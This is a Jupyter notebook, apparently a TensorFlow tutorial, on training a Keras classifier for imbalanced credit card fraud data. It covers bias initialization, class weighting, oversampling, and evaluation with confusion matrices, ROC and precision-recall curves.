"# Use a utility from sklearn to split and shuffle your dataset.\ntrain_df, test_df = train_test_split(cleaned_df, test_size=0.2)\ntrain_df, val_df = train_test_split(train_df, test_size=0.2)\n\n# Form np arrays of labels and features.\ntrain_labels = np.array(train_df.pop('Class'))\nbool_train_labels = train_labels != 0\nval_labels = np.array(val_df.pop('Class'))\ntest_labels = np.array(test_df.pop('Class'))\n\ntrain_features = np.array(train_df)\nval_features = np.array(val_df)\ntest_features = np.array(test_df)",
"_____no_output_____"
]
],
[
[
"Normalize the input features using the sklearn StandardScaler.\nThis will set the mean to 0 and standard deviation to 1.\n\nNote: The `StandardScaler` is only fit using the `train_features` to be sure the model is not peeking at the validation or test sets. ",
"_____no_output_____"
]
],
[
[
"scaler = StandardScaler()\ntrain_features = scaler.fit_transform(train_features)\n\nval_features = scaler.transform(val_features)\ntest_features = scaler.transform(test_features)\n\ntrain_features = np.clip(train_features, -5, 5)\nval_features = np.clip(val_features, -5, 5)\ntest_features = np.clip(test_features, -5, 5)\n\n\nprint('Training labels shape:', train_labels.shape)\nprint('Validation labels shape:', val_labels.shape)\nprint('Test labels shape:', test_labels.shape)\n\nprint('Training features shape:', train_features.shape)\nprint('Validation features shape:', val_features.shape)\nprint('Test features shape:', test_features.shape)\n",
"_____no_output_____"
]
],
[
[
"Caution: If you want to deploy a model, it's critical that you preserve the preprocessing calculations. The easiest way to implement them as layers, and attach them to your model before export.\n",
"_____no_output_____"
],
[
"### Look at the data distribution\n\nNext compare the distributions of the positive and negative examples over a few features. Good questions to ask yourself at this point are:\n\n* Do these distributions make sense? \n * Yes. You've normalized the input and these are mostly concentrated in the `+/- 2` range.\n* Can you see the difference between the distributions?\n * Yes the positive examples contain a much higher rate of extreme values.",
"_____no_output_____"
]
],
[
[
"pos_df = pd.DataFrame(train_features[ bool_train_labels], columns=train_df.columns)\nneg_df = pd.DataFrame(train_features[~bool_train_labels], columns=train_df.columns)\n\nsns.jointplot(pos_df['V5'], pos_df['V6'],\n kind='hex', xlim=(-5,5), ylim=(-5,5))\nplt.suptitle(\"Positive distribution\")\n\nsns.jointplot(neg_df['V5'], neg_df['V6'],\n kind='hex', xlim=(-5,5), ylim=(-5,5))\n_ = plt.suptitle(\"Negative distribution\")",
"_____no_output_____"
]
],
[
[
"## Define the model and metrics\n\nDefine a function that creates a simple neural network with a densly connected hidden layer, a [dropout](https://developers.google.com/machine-learning/glossary/#dropout_regularization) layer to reduce overfitting, and an output sigmoid layer that returns the probability of a transaction being fraudulent: ",
"_____no_output_____"
]
],
[
[
"METRICS = [\n keras.metrics.TruePositives(name='tp'),\n keras.metrics.FalsePositives(name='fp'),\n keras.metrics.TrueNegatives(name='tn'),\n keras.metrics.FalseNegatives(name='fn'), \n keras.metrics.BinaryAccuracy(name='accuracy'),\n keras.metrics.Precision(name='precision'),\n keras.metrics.Recall(name='recall'),\n keras.metrics.AUC(name='auc'),\n keras.metrics.AUC(name='prc', curve='PR'), # precision-recall curve\n]\n\ndef make_model(metrics=METRICS, output_bias=None):\n if output_bias is not None:\n output_bias = tf.keras.initializers.Constant(output_bias)\n model = keras.Sequential([\n keras.layers.Dense(\n 16, activation='relu',\n input_shape=(train_features.shape[-1],)),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(1, activation='sigmoid',\n bias_initializer=output_bias),\n ])\n\n model.compile(\n optimizer=keras.optimizers.Adam(learning_rate=1e-3),\n loss=keras.losses.BinaryCrossentropy(),\n metrics=metrics)\n\n return model",
"_____no_output_____"
]
],
[
[
"### Understanding useful metrics\n\nNotice that there are a few metrics defined above that can be computed by the model that will be helpful when evaluating the performance.\n\n\n\n* **False** negatives and **false** positives are samples that were **incorrectly** classified\n* **True** negatives and **true** positives are samples that were **correctly** classified\n* **Accuracy** is the percentage of examples correctly classified\n> $\\frac{\\text{true samples}}{\\text{total samples}}$\n* **Precision** is the percentage of **predicted** positives that were correctly classified\n> $\\frac{\\text{true positives}}{\\text{true positives + false positives}}$\n* **Recall** is the percentage of **actual** positives that were correctly classified\n> $\\frac{\\text{true positives}}{\\text{true positives + false negatives}}$\n* **AUC** refers to the Area Under the Curve of a Receiver Operating Characteristic curve (ROC-AUC). This metric is equal to the probability that a classifier will rank a random positive sample higher than a random negative sample.\n* **AUPRC** refers to Area Under the Curve of the Precision-Recall Curve. This metric computes precision-recall pairs for different probability thresholds. \n\nNote: Accuracy is not a helpful metric for this task. You can 99.8%+ accuracy on this task by predicting False all the time. \n\nRead more:\n* [True vs. False and Positive vs. Negative](https://developers.google.com/machine-learning/crash-course/classification/true-false-positive-negative)\n* [Accuracy](https://developers.google.com/machine-learning/crash-course/classification/accuracy)\n* [Precision and Recall](https://developers.google.com/machine-learning/crash-course/classification/precision-and-recall)\n* [ROC-AUC](https://developers.google.com/machine-learning/crash-course/classification/roc-and-auc)\n* [Relationship between Precision-Recall and ROC Curves](https://www.biostat.wisc.edu/~page/rocpr.pdf)",
"_____no_output_____"
],
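[
"As a small worked example (illustrative counts only, not taken from this dataset):\n\n```python\n# Precision and recall from raw confusion-matrix counts\ntp, fp, fn = 80, 20, 40\nprecision = tp / (tp + fp)   # 0.8  -> 80% of the predicted positives were real positives\nrecall = tp / (tp + fn)      # ~0.67 -> two thirds of the actual positives were found\n```",
"_____no_output_____"
],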
[
"## Baseline model",
"_____no_output_____"
],
[
"### Build the model\n\nNow create and train your model using the function that was defined earlier. Notice that the model is fit using a larger than default batch size of 2048, this is important to ensure that each batch has a decent chance of containing a few positive samples. If the batch size was too small, they would likely have no fraudulent transactions to learn from.\n\n\nNote: this model will not handle the class imbalance well. You will improve it later in this tutorial.",
"_____no_output_____"
]
],
[
[
"EPOCHS = 100\nBATCH_SIZE = 2048\n\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_prc', \n verbose=1,\n patience=10,\n mode='max',\n restore_best_weights=True)",
"_____no_output_____"
],
[
"model = make_model()\nmodel.summary()",
"_____no_output_____"
]
],
[
[
"Test run the model:",
"_____no_output_____"
]
],
[
[
"model.predict(train_features[:10])",
"_____no_output_____"
]
],
[
[
"### Optional: Set the correct initial bias.",
"_____no_output_____"
],
[
"These initial guesses are not great. You know the dataset is imbalanced. Set the output layer's bias to reflect that (See: [A Recipe for Training Neural Networks: \"init well\"](http://karpathy.github.io/2019/04/25/recipe/#2-set-up-the-end-to-end-trainingevaluation-skeleton--get-dumb-baselines)). This can help with initial convergence.",
"_____no_output_____"
],
[
"With the default bias initialization the loss should be about `math.log(2) = 0.69314` ",
"_____no_output_____"
]
],
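[
[
"That value comes from the cross-entropy of an untrained sigmoid output, which starts out near 0.5 (a quick sanity check, not part of the original tutorial):\n\n```python\nimport math\n# Binary cross-entropy when the model predicts 0.5 for every example\nprint(-math.log(0.5))   # 0.693...\n```",
"_____no_output_____"
]
],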
[
[
"results = model.evaluate(train_features, train_labels, batch_size=BATCH_SIZE, verbose=0)\nprint(\"Loss: {:0.4f}\".format(results[0]))",
"_____no_output_____"
]
],
[
[
"The correct bias to set can be derived from:\n\n$$ p_0 = pos/(pos + neg) = 1/(1+e^{-b_0}) $$\n$$ b_0 = -log_e(1/p_0 - 1) $$\n$$ b_0 = log_e(pos/neg)$$",
"_____no_output_____"
]
],
[
[
"initial_bias = np.log([pos/neg])\ninitial_bias",
"_____no_output_____"
]
],
[
[
"Set that as the initial bias, and the model will give much more reasonable initial guesses. \n\nIt should be near: `pos/total = 0.0018`",
"_____no_output_____"
]
],
[
[
"model = make_model(output_bias=initial_bias)\nmodel.predict(train_features[:10])",
"_____no_output_____"
]
],
[
[
"With this initialization the initial loss should be approximately:\n\n$$-p_0log(p_0)-(1-p_0)log(1-p_0) = 0.01317$$",
"_____no_output_____"
]
],
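[
[
"You can check that value directly (a quick sanity check, not part of the original tutorial; it reuses the `pos` and `total` counts computed earlier in this notebook):\n\n```python\np_0 = pos / total\nanalytic_loss = -p_0 * np.log(p_0) - (1 - p_0) * np.log(1 - p_0)\nprint(analytic_loss)   # roughly 0.013 -- close to the value quoted above\n```",
"_____no_output_____"
]
],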
[
[
"results = model.evaluate(train_features, train_labels, batch_size=BATCH_SIZE, verbose=0)\nprint(\"Loss: {:0.4f}\".format(results[0]))",
"_____no_output_____"
]
],
[
[
"This initial loss is about 50 times less than if would have been with naive initialization.\n\nThis way the model doesn't need to spend the first few epochs just learning that positive examples are unlikely. This also makes it easier to read plots of the loss during training.",
"_____no_output_____"
],
[
"### Checkpoint the initial weights\n\nTo make the various training runs more comparable, keep this initial model's weights in a checkpoint file, and load them into each model before training:",
"_____no_output_____"
]
],
[
[
"initial_weights = os.path.join(tempfile.mkdtemp(), 'initial_weights')\nmodel.save_weights(initial_weights)",
"_____no_output_____"
]
],
[
[
"### Confirm that the bias fix helps\n\nBefore moving on, confirm quick that the careful bias initialization actually helped.\n\nTrain the model for 20 epochs, with and without this careful initialization, and compare the losses: ",
"_____no_output_____"
]
],
[
[
"model = make_model()\nmodel.load_weights(initial_weights)\nmodel.layers[-1].bias.assign([0.0])\nzero_bias_history = model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=20,\n validation_data=(val_features, val_labels), \n verbose=0)",
"_____no_output_____"
],
[
"model = make_model()\nmodel.load_weights(initial_weights)\ncareful_bias_history = model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=20,\n validation_data=(val_features, val_labels), \n verbose=0)",
"_____no_output_____"
],
[
"def plot_loss(history, label, n):\n # Use a log scale on y-axis to show the wide range of values.\n plt.semilogy(history.epoch, history.history['loss'],\n color=colors[n], label='Train ' + label)\n plt.semilogy(history.epoch, history.history['val_loss'],\n color=colors[n], label='Val ' + label,\n linestyle=\"--\")\n plt.xlabel('Epoch')\n plt.ylabel('Loss')",
"_____no_output_____"
],
[
"plot_loss(zero_bias_history, \"Zero Bias\", 0)\nplot_loss(careful_bias_history, \"Careful Bias\", 1)",
"_____no_output_____"
]
],
[
[
"The above figure makes it clear: In terms of validation loss, on this problem, this careful initialization gives a clear advantage. ",
"_____no_output_____"
],
[
"### Train the model",
"_____no_output_____"
]
],
[
[
"model = make_model()\nmodel.load_weights(initial_weights)\nbaseline_history = model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=EPOCHS,\n callbacks=[early_stopping],\n validation_data=(val_features, val_labels))",
"_____no_output_____"
]
],
[
[
"### Check training history\n\nIn this section, you will produce plots of your model's accuracy and loss on the training and validation set. These are useful to check for overfitting, which you can learn more about in the [Overfit and underfit](https://www.tensorflow.org/tutorials/keras/overfit_and_underfit) tutorial.\n\nAdditionally, you can produce these plots for any of the metrics you created above. False negatives are included as an example.",
"_____no_output_____"
]
],
[
[
"def plot_metrics(history):\n metrics = ['loss', 'prc', 'precision', 'recall']\n for n, metric in enumerate(metrics):\n name = metric.replace(\"_\",\" \").capitalize()\n plt.subplot(2,2,n+1)\n plt.plot(history.epoch, history.history[metric], color=colors[0], label='Train')\n plt.plot(history.epoch, history.history['val_'+metric],\n color=colors[0], linestyle=\"--\", label='Val')\n plt.xlabel('Epoch')\n plt.ylabel(name)\n if metric == 'loss':\n plt.ylim([0, plt.ylim()[1]])\n elif metric == 'auc':\n plt.ylim([0.8,1])\n else:\n plt.ylim([0,1])\n\n plt.legend()",
"_____no_output_____"
],
[
"plot_metrics(baseline_history)",
"_____no_output_____"
]
],
[
[
"Note: That the validation curve generally performs better than the training curve. This is mainly caused by the fact that the dropout layer is not active when evaluating the model.",
"_____no_output_____"
],
[
"### Evaluate metrics\n\nYou can use a [confusion matrix](https://developers.google.com/machine-learning/glossary/#confusion_matrix) to summarize the actual vs. predicted labels, where the X axis is the predicted label and the Y axis is the actual label:",
"_____no_output_____"
]
],
[
[
"train_predictions_baseline = model.predict(train_features, batch_size=BATCH_SIZE)\ntest_predictions_baseline = model.predict(test_features, batch_size=BATCH_SIZE)",
"_____no_output_____"
],
[
"def plot_cm(labels, predictions, p=0.5):\n cm = confusion_matrix(labels, predictions > p)\n plt.figure(figsize=(5,5))\n sns.heatmap(cm, annot=True, fmt=\"d\")\n plt.title('Confusion matrix @{:.2f}'.format(p))\n plt.ylabel('Actual label')\n plt.xlabel('Predicted label')\n\n print('Legitimate Transactions Detected (True Negatives): ', cm[0][0])\n print('Legitimate Transactions Incorrectly Detected (False Positives): ', cm[0][1])\n print('Fraudulent Transactions Missed (False Negatives): ', cm[1][0])\n print('Fraudulent Transactions Detected (True Positives): ', cm[1][1])\n print('Total Fraudulent Transactions: ', np.sum(cm[1]))",
"_____no_output_____"
]
],
[
[
"Evaluate your model on the test dataset and display the results for the metrics you created above:",
"_____no_output_____"
]
],
[
[
"baseline_results = model.evaluate(test_features, test_labels,\n batch_size=BATCH_SIZE, verbose=0)\nfor name, value in zip(model.metrics_names, baseline_results):\n print(name, ': ', value)\nprint()\n\nplot_cm(test_labels, test_predictions_baseline)",
"_____no_output_____"
]
],
[
[
"If the model had predicted everything perfectly, this would be a [diagonal matrix](https://en.wikipedia.org/wiki/Diagonal_matrix) where values off the main diagonal, indicating incorrect predictions, would be zero. In this case the matrix shows that you have relatively few false positives, meaning that there were relatively few legitimate transactions that were incorrectly flagged. However, you would likely want to have even fewer false negatives despite the cost of increasing the number of false positives. This trade off may be preferable because false negatives would allow fraudulent transactions to go through, whereas false positives may cause an email to be sent to a customer to ask them to verify their card activity.",
"_____no_output_____"
],
[
"### Plot the ROC\n\nNow plot the [ROC](https://developers.google.com/machine-learning/glossary#ROC). This plot is useful because it shows, at a glance, the range of performance the model can reach just by tuning the output threshold.",
"_____no_output_____"
]
],
[
[
"def plot_roc(name, labels, predictions, **kwargs):\n fp, tp, _ = sklearn.metrics.roc_curve(labels, predictions)\n\n plt.plot(100*fp, 100*tp, label=name, linewidth=2, **kwargs)\n plt.xlabel('False positives [%]')\n plt.ylabel('True positives [%]')\n plt.xlim([-0.5,20])\n plt.ylim([80,100.5])\n plt.grid(True)\n ax = plt.gca()\n ax.set_aspect('equal')",
"_____no_output_____"
],
[
"plot_roc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\nplot_roc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"### Plot the AUPRC\r\n\nNow plot the [AUPRC](https://developers.google.com/machine-learning/glossary?hl=en#PR_AUC). Area under the interpolated precision-recall curve, obtained by plotting (recall, precision) points for different values of the classification threshold. Depending on how it's calculated, PR AUC may be equivalent to the average precision of the model.\r\n",
"_____no_output_____"
]
],
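 [
  [
   "One common definition of average precision (used, for example, by scikit-learn's `average_precision_score`) makes that connection explicit:\n\n$$\\mathrm{AP} = \\sum_n (R_n - R_{n-1}) P_n$$\n\nwhere $P_n$ and $R_n$ are the precision and recall at the $n$-th threshold. This is the sense in which PR AUC may be equivalent to the model's average precision.",
   "_____no_output_____"
  ]
 ],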
[
[
"def plot_prc(name, labels, predictions, **kwargs):\r\n precision, recall, _ = sklearn.metrics.precision_recall_curve(labels, predictions)\r\n\r\n plt.plot(precision, recall, label=name, linewidth=2, **kwargs)\r\n plt.xlabel('Recall')\r\n plt.ylabel('Precision')\r\n plt.grid(True)\r\n ax = plt.gca()\r\n ax.set_aspect('equal')",
"_____no_output_____"
],
[
"plot_prc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\r\nplot_prc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\r\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"It looks like the precision is relatively high, but the recall and the area under the ROC curve (AUC) aren't as high as you might like. Classifiers often face challenges when trying to maximize both precision and recall, which is especially true when working with imbalanced datasets. It is important to consider the costs of different types of errors in the context of the problem you care about. In this example, a false negative (a fraudulent transaction is missed) may have a financial cost, while a false positive (a transaction is incorrectly flagged as fraudulent) may decrease user happiness.",
"_____no_output_____"
],
[
"## Class weights",
"_____no_output_____"
],
[
"### Calculate class weights\n\nThe goal is to identify fraudulent transactions, but you don't have very many of those positive samples to work with, so you would want to have the classifier heavily weight the few examples that are available. You can do this by passing Keras weights for each class through a parameter. These will cause the model to \"pay more attention\" to examples from an under-represented class.",
"_____no_output_____"
]
],
[
[
"# Scaling by total/2 helps keep the loss to a similar magnitude.\n# The sum of the weights of all examples stays the same.\nweight_for_0 = (1 / neg) * (total / 2.0)\nweight_for_1 = (1 / pos) * (total / 2.0)\n\nclass_weight = {0: weight_for_0, 1: weight_for_1}\n\nprint('Weight for class 0: {:.2f}'.format(weight_for_0))\nprint('Weight for class 1: {:.2f}'.format(weight_for_1))",
"_____no_output_____"
]
],
[
[
"### Train a model with class weights\n\nNow try re-training and evaluating the model with class weights to see how that affects the predictions.\n\nNote: Using `class_weights` changes the range of the loss. This may affect the stability of the training depending on the optimizer. Optimizers whose step size is dependent on the magnitude of the gradient, like `tf.keras.optimizers.SGD`, may fail. The optimizer used here, `tf.keras.optimizers.Adam`, is unaffected by the scaling change. Also note that because of the weighting, the total losses are not comparable between the two models.",
"_____no_output_____"
]
],
[
[
"weighted_model = make_model()\nweighted_model.load_weights(initial_weights)\n\nweighted_history = weighted_model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=EPOCHS,\n callbacks=[early_stopping],\n validation_data=(val_features, val_labels),\n # The class weights go here\n class_weight=class_weight) ",
"_____no_output_____"
]
],
[
[
"### Check training history",
"_____no_output_____"
]
],
[
[
"plot_metrics(weighted_history)",
"_____no_output_____"
]
],
[
[
"### Evaluate metrics",
"_____no_output_____"
]
],
[
[
"train_predictions_weighted = weighted_model.predict(train_features, batch_size=BATCH_SIZE)\ntest_predictions_weighted = weighted_model.predict(test_features, batch_size=BATCH_SIZE)",
"_____no_output_____"
],
[
"weighted_results = weighted_model.evaluate(test_features, test_labels,\n batch_size=BATCH_SIZE, verbose=0)\nfor name, value in zip(weighted_model.metrics_names, weighted_results):\n print(name, ': ', value)\nprint()\n\nplot_cm(test_labels, test_predictions_weighted)",
"_____no_output_____"
]
],
[
[
"Here you can see that with class weights the accuracy and precision are lower because there are more false positives, but conversely the recall and AUC are higher because the model also found more true positives. Despite having lower accuracy, this model has higher recall (and identifies more fraudulent transactions). Of course, there is a cost to both types of error (you wouldn't want to bug users by flagging too many legitimate transactions as fraudulent, either). Carefully consider the trade-offs between these different types of errors for your application.",
"_____no_output_____"
],
[
"### Plot the ROC",
"_____no_output_____"
]
],
[
[
"plot_roc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\nplot_roc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\n\nplot_roc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\nplot_roc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\n\n\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"### Plot the AUPRC",
"_____no_output_____"
]
],
[
[
"plot_prc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\r\nplot_prc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\r\n\r\nplot_prc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\r\nplot_prc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\r\n\r\n\r\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"## Oversampling",
"_____no_output_____"
],
[
"### Oversample the minority class\n\nA related approach would be to resample the dataset by oversampling the minority class.",
"_____no_output_____"
]
],
[
[
"pos_features = train_features[bool_train_labels]\nneg_features = train_features[~bool_train_labels]\n\npos_labels = train_labels[bool_train_labels]\nneg_labels = train_labels[~bool_train_labels]",
"_____no_output_____"
]
],
[
[
"#### Using NumPy\n\nYou can balance the dataset manually by choosing the right number of random \nindices from the positive examples:",
"_____no_output_____"
]
],
[
[
"ids = np.arange(len(pos_features))\nchoices = np.random.choice(ids, len(neg_features))\n\nres_pos_features = pos_features[choices]\nres_pos_labels = pos_labels[choices]\n\nres_pos_features.shape",
"_____no_output_____"
],
[
"resampled_features = np.concatenate([res_pos_features, neg_features], axis=0)\nresampled_labels = np.concatenate([res_pos_labels, neg_labels], axis=0)\n\norder = np.arange(len(resampled_labels))\nnp.random.shuffle(order)\nresampled_features = resampled_features[order]\nresampled_labels = resampled_labels[order]\n\nresampled_features.shape",
"_____no_output_____"
]
],
[
[
"#### Using `tf.data`",
"_____no_output_____"
],
[
"If you're using `tf.data` the easiest way to produce balanced examples is to start with a `positive` and a `negative` dataset, and merge them. See [the tf.data guide](../../guide/data.ipynb) for more examples.",
"_____no_output_____"
]
],
[
[
"BUFFER_SIZE = 100000\n\ndef make_ds(features, labels):\n ds = tf.data.Dataset.from_tensor_slices((features, labels))#.cache()\n ds = ds.shuffle(BUFFER_SIZE).repeat()\n return ds\n\npos_ds = make_ds(pos_features, pos_labels)\nneg_ds = make_ds(neg_features, neg_labels)",
"_____no_output_____"
]
],
[
[
"Each dataset provides `(feature, label)` pairs:",
"_____no_output_____"
]
],
[
[
"for features, label in pos_ds.take(1):\n print(\"Features:\\n\", features.numpy())\n print()\n print(\"Label: \", label.numpy())",
"_____no_output_____"
]
],
[
[
"Merge the two together using `experimental.sample_from_datasets`:",
"_____no_output_____"
]
],
[
[
"resampled_ds = tf.data.experimental.sample_from_datasets([pos_ds, neg_ds], weights=[0.5, 0.5])\nresampled_ds = resampled_ds.batch(BATCH_SIZE).prefetch(2)",
"_____no_output_____"
],
[
"for features, label in resampled_ds.take(1):\n print(label.numpy().mean())",
"_____no_output_____"
]
],
[
[
"To use this dataset, you'll need the number of steps per epoch.\n\nThe definition of \"epoch\" in this case is less clear. Say it's the number of batches required to see each negative example once:",
"_____no_output_____"
]
],
[
[
"resampled_steps_per_epoch = np.ceil(2.0*neg/BATCH_SIZE)\nresampled_steps_per_epoch",
"_____no_output_____"
]
],
[
[
"### Train on the oversampled data\n\nNow try training the model with the resampled data set instead of using class weights to see how these methods compare.\n\nNote: Because the data was balanced by replicating the positive examples, the total dataset size is larger, and each epoch runs for more training steps. ",
"_____no_output_____"
]
],
[
[
"resampled_model = make_model()\nresampled_model.load_weights(initial_weights)\n\n# Reset the bias to zero, since this dataset is balanced.\noutput_layer = resampled_model.layers[-1] \noutput_layer.bias.assign([0])\n\nval_ds = tf.data.Dataset.from_tensor_slices((val_features, val_labels)).cache()\nval_ds = val_ds.batch(BATCH_SIZE).prefetch(2) \n\nresampled_history = resampled_model.fit(\n resampled_ds,\n epochs=EPOCHS,\n steps_per_epoch=resampled_steps_per_epoch,\n callbacks=[early_stopping],\n validation_data=val_ds)",
"_____no_output_____"
]
],
[
[
"If the training process were considering the whole dataset on each gradient update, this oversampling would be basically identical to the class weighting.\n\nBut when training the model batch-wise, as you did here, the oversampled data provides a smoother gradient signal: Instead of each positive example being shown in one batch with a large weight, they're shown in many different batches each time with a small weight. \n\nThis smoother gradient signal makes it easier to train the model.",
"_____no_output_____"
],
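  [
   "Some rough, illustrative arithmetic makes the difference concrete (it reuses the `pos`, `total`, and `BATCH_SIZE` values defined earlier in this tutorial):\n\n```python\n# Average number of positive examples per batch before and after 50/50 resampling.\nprint('original data:  ', BATCH_SIZE * pos / total)\nprint('resampled data: ', BATCH_SIZE * 0.5)\n```",
   "_____no_output_____"
  ],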
[
"### Check training history\n\nNote that the distributions of metrics will be different here, because the training data has a totally different distribution from the validation and test data. ",
"_____no_output_____"
]
],
[
[
"plot_metrics(resampled_history)",
"_____no_output_____"
]
],
[
[
"### Re-train\n",
"_____no_output_____"
],
[
"Because training is easier on the balanced data, the above training procedure may overfit quickly. \n\nSo break up the epochs to give the `tf.keras.callbacks.EarlyStopping` finer control over when to stop training.",
"_____no_output_____"
]
],
[
[
"resampled_model = make_model()\nresampled_model.load_weights(initial_weights)\n\n# Reset the bias to zero, since this dataset is balanced.\noutput_layer = resampled_model.layers[-1] \noutput_layer.bias.assign([0])\n\nresampled_history = resampled_model.fit(\n resampled_ds,\n # These are not real epochs\n steps_per_epoch=20,\n epochs=10*EPOCHS,\n callbacks=[early_stopping],\n validation_data=(val_ds))",
"_____no_output_____"
]
],
[
[
"### Re-check training history",
"_____no_output_____"
]
],
[
[
"plot_metrics(resampled_history)",
"_____no_output_____"
]
],
[
[
"### Evaluate metrics",
"_____no_output_____"
]
],
[
[
"train_predictions_resampled = resampled_model.predict(train_features, batch_size=BATCH_SIZE)\ntest_predictions_resampled = resampled_model.predict(test_features, batch_size=BATCH_SIZE)",
"_____no_output_____"
],
[
"resampled_results = resampled_model.evaluate(test_features, test_labels,\n batch_size=BATCH_SIZE, verbose=0)\nfor name, value in zip(resampled_model.metrics_names, resampled_results):\n print(name, ': ', value)\nprint()\n\nplot_cm(test_labels, test_predictions_resampled)",
"_____no_output_____"
]
],
[
[
"### Plot the ROC",
"_____no_output_____"
]
],
[
[
"plot_roc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\nplot_roc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\n\nplot_roc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\nplot_roc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\n\nplot_roc(\"Train Resampled\", train_labels, train_predictions_resampled, color=colors[2])\nplot_roc(\"Test Resampled\", test_labels, test_predictions_resampled, color=colors[2], linestyle='--')\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"### Plot the AUPRC\r\n",
"_____no_output_____"
]
],
[
[
"plot_prc(\"Train Baseline\", train_labels, train_predictions_baseline, color=colors[0])\r\nplot_prc(\"Test Baseline\", test_labels, test_predictions_baseline, color=colors[0], linestyle='--')\r\n\r\nplot_prc(\"Train Weighted\", train_labels, train_predictions_weighted, color=colors[1])\r\nplot_prc(\"Test Weighted\", test_labels, test_predictions_weighted, color=colors[1], linestyle='--')\r\n\r\nplot_prc(\"Train Resampled\", train_labels, train_predictions_resampled, color=colors[2])\r\nplot_prc(\"Test Resampled\", test_labels, test_predictions_resampled, color=colors[2], linestyle='--')\r\nplt.legend(loc='lower right')",
"_____no_output_____"
]
],
[
[
"## Applying this tutorial to your problem\n\nImbalanced data classification is an inherently difficult task since there are so few samples to learn from. You should always start with the data first and do your best to collect as many samples as possible and give substantial thought to what features may be relevant so the model can get the most out of your minority class. At some point your model may struggle to improve and yield the results you want, so it is important to keep in mind the context of your problem and the trade offs between different types of errors.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb02278c5f3bb8ac3d1c92589b5b43565a7d5442 | 66,755 | ipynb | Jupyter Notebook | TF-in-practice-Coursera/3-NLP/NLP_Course_Week_3_Exercise_Question_exploring_overfitting_in_nlp.ipynb | yuynwa/Coursera | e7e44dc11575e00feaa5c4996c97156988c13f6f | [
"MIT"
] | null | null | null | TF-in-practice-Coursera/3-NLP/NLP_Course_Week_3_Exercise_Question_exploring_overfitting_in_nlp.ipynb | yuynwa/Coursera | e7e44dc11575e00feaa5c4996c97156988c13f6f | [
"MIT"
